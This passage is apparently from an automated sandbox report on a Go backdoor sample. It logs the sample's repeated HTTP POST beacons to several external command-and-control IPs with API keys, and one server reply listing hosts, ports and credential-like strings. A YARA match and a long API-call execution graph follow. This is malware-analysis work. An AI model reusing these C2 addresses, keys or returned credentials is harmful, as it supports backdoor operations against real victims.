                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: roePuyRb
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:18:43.878026009 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:43 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.8 | 49705 | 46.8.236.61 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:18:43.996113062 CET | 333 | OUT | POST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: aZJvaNJM
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:18:44.880003929 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:44 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.8 | 49706 | 93.185.159.253 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:18:44.924094915 CET | 336 | OUT | POST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: jQyaDn9L
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:18:45.792134047 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:45 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.8 | 49707 | 91.212.166.91 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:18:45.820377111 CET | 335 | OUT | POST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: EAalWPI3
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:18:46.723715067 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:46 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.8 | 49708 | 188.130.206.243 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:18:46.753221989 CET | 337 | OUT | POST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: nfnVo8vT
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:18:47.967667103 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.8 | 49714 | 46.8.232.106 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:19:18.042007923 CET | 334 | OUT | POST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: mIQ60NDK
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:19:18.992965937 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:18 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                              6 | 192.168.2.8 | 49715 | 46.8.236.61 | 80
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:19:19.021840096 CET | 333 | OUT | POST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: AYMhFAHY
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:19:19.890888929 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:19 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.8 | 49716 | 93.185.159.253 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:19:19.922182083 CET | 336 | OUT | POST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: alJ3chjw
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:19:20.829529047 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:20 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.8 | 49717 | 91.212.166.91 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:19:20.873711109 CET | 335 | OUT | POST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: f0N7GKZ3
                              Accept-Encoding: gzip
                              Nov 6, 2024 17:19:22.175688028 CET | 556 | IN | HTTP/1.1 200 OK
                              Date: Wed, 06 Nov 2024 16:19:22 GMT
                              Content-Length: 438
                              Content-Type: text/plain; charset=utf-8
                              Data Ascii: 185.121.233.152;25139;hdRZtdaathOIpl5B:45M/NHX/TfA41D16ikQ.pDZ8whi.3MQ2Lme3PgL2pqH.NJP1SXm0edG6VmY,d3phPdZtEuQtO7EpgZC:klJ/IrH/Lpz4H2e6886.ab88pj5.Hq82UGg3nyx6PnH.jDN6Miw1pfK,TpOhP7Wt40qtDQXpY9t:uQV/Zfa/WW19GfW3i1o.hBz1AZu8rTo5Y9C.SQX1EFS5ccw9LSW.TqY2zVg5Azo3VMB,hr6htiWtCEltiWxpTRy:XH7/dBv/nrB9tP51NDw.LZR2ghF1P4w2f1m.Y221cSw6GoU6iFX.eyG9ox81mgh,SVahcvhtg47tNrapIpR:NXT/smT/CZZ12V58bAu8aV7.ZsL1xwE3auE0DAs.Pi32BwO0BdI6HRE.IHp2EPL4Qzo3jQE
                              Nov 6, 2024 17:19:52.178417921 CET | 6 | OUT | Data Raw: 00
                              Data Ascii:
                              Nov 6, 2024 17:20:22.194598913 CET | 6 | OUT | Data Raw: 00
                              Data Ascii:


                              Target ID: 0
                              Start time: 11:18:41
                              Start date: 06/11/2024
                              Path: C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\Desktop\m0Yc9KltGw.exe"
                              Imagebase: 0x400000
                              File size: 9'312'768 bytes
                              MD5 hash: 63B7BB26A60FB9E73C0E1427A4FCFAF2
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation: low
                              Has exited: false

                                Execution Graph

                                Execution Coverage: 21.1%
                                Dynamic/Decrypted Code Coverage: 79.1%
                                Signature Coverage: 42.6%
                                Total number of Nodes: 2000
                                Total number of Limit Nodes: 268
107357->111586 111620 2940d31 107357->111620 111646 2941931 107357->111646 111664 2925d0f 107357->111664 111694 2941536 107357->111694 111714 296150f 107357->111714 111720 2960d0c 107357->111720 111730 2962901 107357->111730 111734 2926d0a 107357->111734 111768 2928100 107357->111768 111796 296b100 107357->111796 111802 2928d02 107357->111802 111818 2923d03 107357->111818 111859 296191d 107357->111859 111865 2927d1d 107357->111865 111895 2927917 107357->111895 111925 296b111 107357->111925 111931 2941914 107357->111931 111949 2942917 107357->111949 111955 29271e1 107357->111955 111985 29269e9 107357->111985 112017 29255fe 107357->112017 112047 2962dfa 107357->112047 112051 29425f4 107357->112051 112064 29419f7 107357->112064 112082 29255cc 107357->112082 112112 29429ca 107357->112112 112116 29421c9 107357->112116 112138 29619cb 107357->112138 112144 29269c9 107357->112144 112174 29629cd 107357->112174 112178 2923dc4 107357->112178 112216 29291c4 107357->112216 112241 29291dc 107357->112241 112266 2922dc7 107357->112266 112270 29231d9 107357->112270 112274 29241dc 107357->112274 112311 29271d8 107357->112311 112341 2942dde 107357->112341 112345 29621d5 107357->112345 112351 2923dd7 107357->112351 112390 2924dd0 107357->112390 112424 29619d4 107357->112424 112430 29241aa 107357->112430 112467 29261a9 107357->112467 112497 29421a0 107357->112497 112515 29431a1 107357->112515 112519 2940da5 107357->112519 112544 29261a0 107357->112544 112574 29239b8 107357->112574 112615 2924db9 107357->112615 112649 29269b6 107357->112649 112679 29249bb 107357->112679 112716 29619b6 107357->112716 112722 29291b1 107357->112722 112747 2925db2 107357->112747 112777 2941db4 107357->112777 112795 2962589 107357->112795 112807 29265b2 107357->112807 112837 2960d88 107357->112837 112847 2925d8d 107357->112847 112877 2961d82 107357->112877 112883 296b18e 107357->112883 112887 2927d82 107357->112887 112917 2924583 107357->112917 112954 2941999 107357->112954 112972 2924182 107357->112972 
113009 2929198 107357->113009 113032 292719f 107357->113032 113062 2924996 107357->113062 113099 2928998 107357->113099 113120 2960d96 107357->113120 113130 2962d95 107357->113130 113134 2922c68 107357->113134 113138 2942b0d 107357->113138 113141 2960b39 107357->113141 113151 2924868 107357->113151 113192 2929c66 107357->113192 113198 2928864 107357->113198 113220 292947c 107357->113220 113241 2923063 107357->113241 113245 296e471 107357->113245 113255 294247f 107357->113255 113267 296084b 107357->113267 113277 2928074 107357->113277 113307 2960c4c 107357->113307 113317 29424dc 107357->113317 113329 292344a 107357->113329 113370 2940c4d 107357->113370 113396 2962042 107357->113396 113402 2924045 107357->113402 113439 2923840 107357->113439 113480 2922c40 107357->113480 113484 292445d 107357->113484 113521 2941445 107357->113521 113543 296085f 107357->113543 113553 2961858 107357->113553 113559 296305e 107357->113559 113563 2942c5d 107357->113563 113567 2942850 107357->113567 113573 2925854 107357->113573 113603 2925c52 107357->113603 113633 2940850 107357->113633 113659 2925c27 107357->113659 113689 296d82a 107357->113689 113701 2962c27 107357->113701 113705 2929820 107357->113705 113714 294083b 107357->113714 113740 2963039 107357->113740 113744 296083c 107357->113744 113754 296203b 107357->113754 113760 2923831 107357->113760 113801 2942430 107357->113801 113813 296d401 107357->113813 113825 2925030 107357->113825 113859 2923007 107357->113859 113863 2961803 107357->113863 113869 2926c01 107357->113869 113903 2928806 107357->113903 113925 296dc07 107357->113925 113940 2963007 107357->113940 113944 2962c10 107357->113944 113948 292481e 107357->113948 113985 2925c16 107357->113985 114015 2924c17 107357->114015 114052 29248ee 107357->114052 114089 296dc17 107357->114089 114103 2962ce5 107357->114103 114107 29288e6 107357->114107 114129 29280e1 107357->114129 114157 2940ce7 107357->114157 114183 2929cf5 107357->114183 114187 29280f9 107357->114187 114215 29614f0 
107357->114215 114223 29294f5 107357->114223 114237 2941cf5 107357->114237 114255 2940cf2 107357->114255 114281 29624cd 107357->114281 114287 2960b64 107357->114287 114297 29418c1 107357->114297 114315 29608ce 107357->114315 114325 29414c7 107357->114325 114347 2925cc6 107357->114347 114377 2962cd9 107357->114377 114381 29298c3 107357->114381 114393 296eb78 107357->114393 114397 29408dd 107357->114397 114423 29280d5 107357->114423 114453 29248d5 107357->114453 114490 29294d6 107357->114490 114510 29264d4 107357->114510 114540 29270d0 107357->114540 114570 29618d4 107357->114570 114576 29608a7 107357->114576 114586 29414ac 107357->114586 114608 29620b5 107357->114608 114614 29240bb 107357->114614 114651 2960888 107357->114651 114661 2926cb3 107357->114661 114695 2940887 107357->114695 114721 2940c8e 107357->114721 114747 2960c9b 107357->114747 114757 2941885 107357->114757 114775 2929c95 107357->114775 114781 2929c9a 107357->114781 114787 2953091 107357->114787 114792 2929494 107357->114792 114812 2941f68 107357->114812 114830 2942497 107357->114830 114842 2926768 107357->114842 114872 2941463 107357->114872 114894 294146a 107357->114894 114916 2940b62 107357->114916 114942 2942f70 107357->114942 114946 2923b30 107357->114946 114987 2942f4b 107357->114987 114991 2926372 107357->114991 115021 2926b4e 107357->115021 115055 2941749 107357->115055 115073 292875b 107357->115073 115095 296274d 107357->115095 115101 296c350 107357->115101 115123 2961751 107357->115123 115129 296bf29 107357->115129 115151 2924f52 107357->115151 115185 2926b26 107357->115185 115219 29288cd 107357->115219 115241 296276c 107357->115241 115247 2961b26 107357->115247 115253 2941f0e 107357->115253 115271 2927334 107357->115271 115301 292730f 107357->115301 115331 2928f33 107357->115331 115356 296bf0a 107357->115356 115378 2940b28 107357->115378 115404 2941f08 107357->115404 115422 2926306 107357->115422 115452 2940b00 107357->115452 115478 2961b01 107357->115478 115484 2928b1c 107357->115484 
107361 41d700 107358->107361 107362 41e00d 107358->107362 107360->107356 107360->107357 115504 41d7c7 VirtualProtect VirtualProtect VirtualProtect VirtualProtect VirtualProtect 107361->115504 115505 41e08f VirtualProtect VirtualProtect VirtualProtect 107362->115505 107754 41d0d1 VirtualProtect 107753->107754 107756 41d1d1 107754->107756 107759 41d208 107754->107759 107756->107756 107763 41d2f0 107759->107763 107764 2926a92 25 API calls 107759->107764 107765 2927290 25 API calls 107759->107765 107766 296a695 5 API calls 107759->107766 107767 2941290 13 API calls 107759->107767 107768 2961e91 2 API calls 107759->107768 107769 2927a9a 25 API calls 107759->107769 107770 2941a9f 8 API calls 107759->107770 107771 2941e80 8 API calls 107759->107771 107772 296aa80 4 API calls 107759->107772 107773 292628b 25 API calls 107759->107773 107774 2928289 19 API calls 107759->107774 107775 2942ab6 VirtualProtect 107759->107775 107776 29296b1 6 API calls 107759->107776 107777 296a6b5 VirtualAlloc 107759->107777 107778 29626b1 2 API calls 107759->107778 107779 2942ebe VirtualProtect 107759->107779 107780 296aabd 4 API calls 107759->107780 107781 2926ebe 25 API calls 107759->107781 107782 296eaba 2 API calls 107759->107782 107783 29632ba VirtualProtect 107759->107783 107784 2942aa4 VirtualProtect 107759->107784 107785 29262a6 25 API calls 107759->107785 107786 2926ea4 25 API calls 107759->107786 107787 2942ead VirtualProtect 107759->107787 107788 29296d0 6 API calls 107759->107788 107789 2962ed5 VirtualProtect 107759->107789 107790 296aeda 2 API calls 107759->107790 107791 29272dd 25 API calls 107759->107791 107792 2941ac4 8 API calls 107759->107792 107793 296aec4 3 API calls 107759->107793 107794 29266c7 25 API calls 107759->107794 107795 2961acf 2 API calls 107759->107795 107796 29266ce 25 API calls 107759->107796 107797 2960ac9 4 API calls 107759->107797 107798 296bef6 13 API calls 107759->107798 107799 2941efc 8 API calls 107759->107799 107800 29626fe 6 API calls 107759->107800 
107801 29262f8 25 API calls 107759->107801 107802 2926ee1 25 API calls 107759->107802 107803 296e6e5 4 API calls 107759->107803 107804 296aaec 4 API calls 107759->107804 107805 2924e12 27 API calls 107759->107805 107806 2928a11 18 API calls 107759->107806 107807 2941e17 8 API calls 107759->107807 107808 2942e10 VirtualProtect 107759->107808 107809 2962612 6 API calls 107759->107809 107810 2927618 25 API calls 107759->107810 107811 294261f 2 API calls 107759->107811 107812 2941a19 8 API calls 107759->107812 107813 294121a 14 API calls 107759->107813 107814 2941e04 8 API calls 107759->107814 107815 2924201 29 API calls 107759->107815 107816 2923a08 45 API calls 107759->107816 107817 2929a0f 3 API calls 107759->107817 107818 294160a 10 API calls 107759->107818 107819 2961236 3 API calls 107759->107819 107820 2924e31 27 API calls 107759->107820 107821 2924e36 27 API calls 107759->107821 107822 292863f 19 API calls 107759->107822 107823 2923e3f 29 API calls 107759->107823 107824 296123b 3 API calls 107759->107824 107825 2925623 25 API calls 107759->107825 107826 2922e23 VirtualProtect 107759->107826 107827 2925a21 25 API calls 107759->107827 107828 2926e26 27 API calls 107759->107828 107829 2928a2b 18 API calls 107759->107829 107830 292962e 6 API calls 107759->107830 107831 292722c 25 API calls 107759->107831 107832 2923e2c 33 API calls 107759->107832 107833 2962a29 VirtualProtect 107759->107833 107834 2924650 29 API calls 107759->107834 107835 2927250 25 API calls 107759->107835 107836 2941252 8 API calls 107759->107836 107837 2960a51 4 API calls 107759->107837 107838 2929a5a 3 API calls 107759->107838 107839 2962a5c VirtualProtect 107759->107839 107840 294265f 4 API calls 107759->107840 107841 2927e5f 19 API calls 107759->107841 107842 292865c 19 API calls 107759->107842 107843 2928241 21 API calls 107759->107843 107844 294164c 9 API calls 107759->107844 107845 2940a4e 15 API calls 107759->107845 107846 2922e73 VirtualProtect 107759->107846 107847 296ea75 3 API calls 
107759->107847 107848 2962272 2 API calls 107759->107848 107849 2929277 VirtualFree 107759->107849 107850 296167d 2 API calls 107759->107850 107851 2962e7a VirtualProtect 107759->107851 107852 296127a 2 API calls 107759->107852 107853 2928a7c 17 API calls 107759->107853 107854 292727d 25 API calls 107759->107854 107855 2922e63 VirtualProtect 107759->107855 107856 2961e67 2 API calls 107759->107856 107857 2941661 8 API calls 107759->107857 107858 2960a60 4 API calls 107759->107858 107859 2961261 2 API calls 107759->107859 107860 2926e6a 25 API calls 107759->107860 107861 292726b 25 API calls 107759->107861 107862 2941a6d 8 API calls 107759->107862 107863 296de68 6 API calls 107759->107863 107864 2922b92 VirtualProtect 107759->107864 107865 2922b97 VirtualProtect 107759->107865 107866 2926f99 25 API calls 107759->107866 107867 2926b80 29 API calls 107759->107867 107868 2926787 25 API calls 107759->107868 107869 2922787 VirtualProtect 107759->107869 107870 2961f8f 2 API calls 107759->107870 107871 2927b8f 25 API calls 107759->107871 107872 2922b8d VirtualProtect 107759->107872 107873 29297b3 6 API calls 107759->107873 107874 2922fb0 VirtualProtect 107759->107874 107875 296d3b2 12 API calls 107759->107875 107876 2926fb4 25 API calls 107759->107876 107877 29417b2 8 API calls 107759->107877 107878 29263ba 25 API calls 107759->107878 107879 29233bb 45 API calls 107759->107879 107880 2941fb8 8 API calls 107759->107880 107881 29617bb 2 API calls 107759->107881 107882 29417a7 8 API calls 107759->107882 107883 2926ba5 29 API calls 107759->107883 107884 29413a3 13 API calls 107759->107884 107885 29417ad 8 API calls 107759->107885 107886 2962faf VirtualProtect 107759->107886 107887 2928fa8 12 API calls 107759->107887 107888 2925ba9 27 API calls 107759->107888 107889 29623a8 2 API calls 107759->107889 107890 2923bad 45 API calls 107759->107890 107891 296dbd6 9 API calls 107759->107891 107892 2940bd5 15 API calls 107759->107892 107893 2923bd1 45 API calls 107759->107893 107894 
296afd8 2 API calls 107759->107894 107895 2941fc4 8 API calls 107759->107895 107896 2928bc6 15 API calls 107759->107896 107897 2928bcb 16 API calls 107759->107897 107898 29423c8 6 API calls 107759->107898 107899 2927fcc 25 API calls 107759->107899 107900 29613c8 3 API calls 107759->107900 107901 2924fcd 27 API calls 107759->107901 107902 29293cd 10 API calls 107759->107902 107903 29417f4 8 API calls 107759->107903 107904 29267f0 25 API calls 107759->107904 107905 29287fb 19 API calls 107759->107905 107906 2922fe2 VirtualProtect 107759->107906 107907 29627e6 VirtualProtect 107759->107907 107908 2925fe3 25 API calls 107759->107908 107909 29423e7 6 API calls 107759->107909 107910 29617e3 2 API calls 107759->107910 107911 2942bef VirtualProtect 107759->107911 107912 2926fef 25 API calls 107759->107912 107913 2941f15 8 API calls 107759->107913 107914 2942316 7 API calls 107759->107914 107915 2928b17 16 API calls 107759->107915 107916 2927719 25 API calls 107759->107916 107917 296bf1d 13 API calls 107759->107917 107918 2942f19 VirtualProtect 107759->107918 107919 2928b1c 16 API calls 107759->107919 107920 2962f05 VirtualProtect 107759->107920 107921 2926306 25 API calls 107759->107921 107922 2940b00 15 API calls 107759->107922 107923 2961b01 2 API calls 107759->107923 107924 2942b0d VirtualProtect 107759->107924 107925 2941f0e 8 API calls 107759->107925 107926 296bf0a 13 API calls 107759->107926 107927 2941f08 8 API calls 107759->107927 107928 292730f 25 API calls 107759->107928 107929 2928f33 12 API calls 107759->107929 107930 2923b30 45 API calls 107759->107930 107931 2927334 25 API calls 107759->107931 107932 2960b39 4 API calls 107759->107932 107933 2961b26 2 API calls 107759->107933 107934 2926b26 29 API calls 107759->107934 107935 2940b28 15 API calls 107759->107935 107936 296bf29 13 API calls 107759->107936 107937 2924f52 27 API calls 107759->107937 107938 296c350 13 API calls 107759->107938 107939 2961751 2 API calls 107759->107939 107940 292875b 19 API calls 
107759->107940 107941 296274d 2 API calls 107759->107941 107942 2926b4e 29 API calls 107759->107942 107943 2941749 8 API calls 107759->107943 107944 2942f4b VirtualProtect 107759->107944 107945 2926372 25 API calls 107759->107945 107946 2942f70 VirtualProtect 107759->107946 107947 296eb78 VirtualAlloc 107759->107947 107948 2960b64 4 API calls 107759->107948 107949 2940b62 15 API calls 107759->107949 107950 2926768 25 API calls 107759->107950 107951 296276c 2 API calls 107759->107951 107952 2941f68 8 API calls 107759->107952 107953 2942497 5 API calls 107759->107953 107954 2953091 2 API calls 107759->107954 107955 2929494 9 API calls 107759->107955 107956 2929c95 2 API calls 107759->107956 107957 2929c9a 2 API calls 107759->107957 107958 2960c9b 4 API calls 107759->107958 107959 2941885 8 API calls 107759->107959 107960 2940887 15 API calls 107759->107960 107961 2940c8e 15 API calls 107759->107961 107962 2960888 4 API calls 107759->107962 107963 2926cb3 29 API calls 107759->107963 107964 29620b5 2 API calls 107759->107964 107965 29240bb 29 API calls 107759->107965 107966 29608a7 4 API calls 107759->107966 107967 29414ac 13 API calls 107759->107967 107968 29270d0 25 API calls 107759->107968 107969 29618d4 2 API calls 107759->107969 107970 29294d6 10 API calls 107759->107970 107971 29264d4 25 API calls 107759->107971 107972 29280d5 25 API calls 107759->107972 107973 29248d5 29 API calls 107759->107973 107974 29424dc 4 API calls 107759->107974 107975 29408dd 15 API calls 107759->107975 107976 2962cd9 VirtualProtect 107759->107976 107977 29298c3 5 API calls 107759->107977 107978 29414c7 12 API calls 107759->107978 107979 2925cc6 25 API calls 107759->107979 107980 29418c1 8 API calls 107759->107980 107981 29608ce 4 API calls 107759->107981 107982 29624cd 2 API calls 107759->107982 107983 29288cd 19 API calls 107759->107983 107984 2941cf5 8 API calls 107759->107984 107985 2940cf2 15 API calls 107759->107985 107986 29614f0 3 API calls 107759->107986 107987 29294f5 7 API 
calls 107759->107987 107988 2929cf5 VirtualFree 107759->107988 107989 29280f9 23 API calls 107759->107989 107990 29280e1 23 API calls 107759->107990 107991 2940ce7 15 API calls 107759->107991 107992 2962ce5 VirtualProtect 107759->107992 107993 29288e6 19 API calls 107759->107993 107994 29248ee 29 API calls 107759->107994 107995 296dc17 7 API calls 107759->107995 107996 2925c16 25 API calls 107759->107996 107997 2924c17 29 API calls 107759->107997 107998 2962c10 VirtualProtect 107759->107998 107999 292481e 29 API calls 107759->107999 108000 296dc07 8 API calls 107759->108000 108001 2963007 VirtualProtect 107759->108001 108002 2926c01 29 API calls 107759->108002 108003 2928806 19 API calls 107759->108003 108004 2923007 VirtualProtect 107759->108004 108005 2961803 2 API calls 107759->108005 108006 296d401 6 API calls 107759->108006 108007 2925030 27 API calls 107759->108007 108008 2923831 45 API calls 107759->108008 108009 2942430 5 API calls 107759->108009 108010 296083c 4 API calls 107759->108010 108011 296203b 2 API calls 107759->108011 108012 294083b 15 API calls 107759->108012 108013 2963039 VirtualProtect 107759->108013 108014 2962c27 VirtualProtect 107759->108014 108015 2929820 5 API calls 107759->108015 108016 2925c27 25 API calls 107759->108016 108017 296d82a 6 API calls 107759->108017 108018 2925c52 25 API calls 107759->108018 108019 2940850 15 API calls 107759->108019 108020 2942850 2 API calls 107759->108020 108021 2925854 25 API calls 107759->108021 108022 296305e VirtualProtect 107759->108022 108023 2942c5d VirtualProtect 107759->108023 108024 296085f 4 API calls 107759->108024 108025 2961858 2 API calls 107759->108025 108026 292445d 29 API calls 107759->108026 108027 2941445 13 API calls 107759->108027 108028 2923840 45 API calls 107759->108028 108029 2922c40 VirtualProtect 107759->108029 108030 2962042 2 API calls 107759->108030 108031 2924045 29 API calls 107759->108031 108032 292344a 45 API calls 107759->108032 108033 2940c4d 15 API calls 
107759->108033 108034 2960c4c 4 API calls 107759->108034 108035 2942c4f VirtualProtect 107759->108035 108036 296084b 4 API calls 107759->108036 108037 2928074 25 API calls 107759->108037 108038 296e471 5 API calls 107759->108038 108039 294247f 5 API calls 107759->108039 108040 292947c 9 API calls 107759->108040 108041 2923063 VirtualProtect 107759->108041 108042 2929c66 3 API calls 107759->108042 108043 2928864 19 API calls 107759->108043 108044 2941463 13 API calls 107759->108044 108045 2924868 33 API calls 107759->108045 108046 2922c68 VirtualProtect 107759->108046 108047 294146a 13 API calls 107759->108047 108048 2960d96 4 API calls 107759->108048 108049 2962d95 VirtualProtect 107759->108049 108050 2924996 29 API calls 107759->108050 108051 2928998 19 API calls 107759->108051 108052 2929198 11 API calls 107759->108052 108053 292719f 25 API calls 107759->108053 108054 2941999 8 API calls 107759->108054 108055 2924182 29 API calls 107759->108055 108056 2927d82 25 API calls 107759->108056 108057 2924583 29 API calls 107759->108057 108058 2961d82 2 API calls 107759->108058 108059 296b18e VirtualAlloc 107759->108059 108060 2960d88 4 API calls 107759->108060 108061 2925d8d 25 API calls 107759->108061 108062 2962589 6 API calls 107759->108062 108063 29265b2 25 API calls 107759->108063 108064 2925db2 25 API calls 107759->108064 108065 2941db4 8 API calls 107759->108065 108066 29619b6 2 API calls 107759->108066 108067 29291b1 12 API calls 107759->108067 108068 29269b6 25 API calls 107759->108068 108069 29249bb 29 API calls 107759->108069 108070 29239b8 45 API calls 107759->108070 108071 2924db9 27 API calls 107759->108071 108072 2940da5 15 API calls 107759->108072 108073 29261a0 25 API calls 107759->108073 108074 29421a0 8 API calls 107759->108074 108075 29431a1 VirtualProtect 107759->108075 108076 29241aa 29 API calls 107759->108076 108077 29261a9 25 API calls 107759->108077 108078 2924dd0 27 API calls 107759->108078 108079 29619d4 2 API calls 107759->108079 108080 
29621d5 2 API calls 107759->108080 108081 2923dd7 37 API calls 107759->108081 108082 29271d8 25 API calls 107759->108082 108083 2942dde VirtualProtect 107759->108083 108084 29231d9 VirtualProtect 107759->108084 108085 29241dc 29 API calls 107759->108085 108086 29291dc 11 API calls 107759->108086 108087 2922dc7 VirtualProtect 107759->108087 108088 2923dc4 41 API calls 107759->108088 108089 29291c4 12 API calls 107759->108089 108090 29269c9 25 API calls 107759->108090 108091 29629cd VirtualProtect 107759->108091 108092 29421c9 9 API calls 107759->108092 108093 29619cb 2 API calls 107759->108093 108094 29255cc 25 API calls 107759->108094 108095 29429ca VirtualProtect 107759->108095 108096 29425f4 5 API calls 107759->108096 108097 29419f7 8 API calls 107759->108097 108098 29255fe 25 API calls 107759->108098 108099 2962dfa VirtualProtect 107759->108099 108100 29271e1 25 API calls 107759->108100 108101 29269e9 27 API calls 107759->108101 108102 2941914 8 API calls 107759->108102 108103 2942917 2 API calls 107759->108103 108104 2927917 25 API calls 107759->108104 108105 296b111 2 API calls 107759->108105 108106 296191d 2 API calls 107759->108106 108107 2927d1d 25 API calls 107759->108107 108108 2928d02 13 API calls 107759->108108 108109 2923d03 45 API calls 107759->108109 108110 2928100 23 API calls 107759->108110 108111 296b100 2 API calls 107759->108111 108112 2962901 VirtualProtect 107759->108112 108113 2926d0a 29 API calls 107759->108113 108114 296150f 2 API calls 107759->108114 108115 2960d0c 4 API calls 107759->108115 108116 2925d0f 25 API calls 107759->108116 108117 2941536 11 API calls 107759->108117 108118 2940d31 15 API calls 107759->108118 108119 2941931 8 API calls 107759->108119 108120 2953139 VirtualProtect 107759->108120 108121 2926d20 29 API calls 107759->108121 108122 2962525 6 API calls 107759->108122 108123 292692a 27 API calls 107759->108123 108124 292712b 25 API calls 107759->108124 108125 292552b 25 API calls 107759->108125 108126 296b12f 2 API calls 
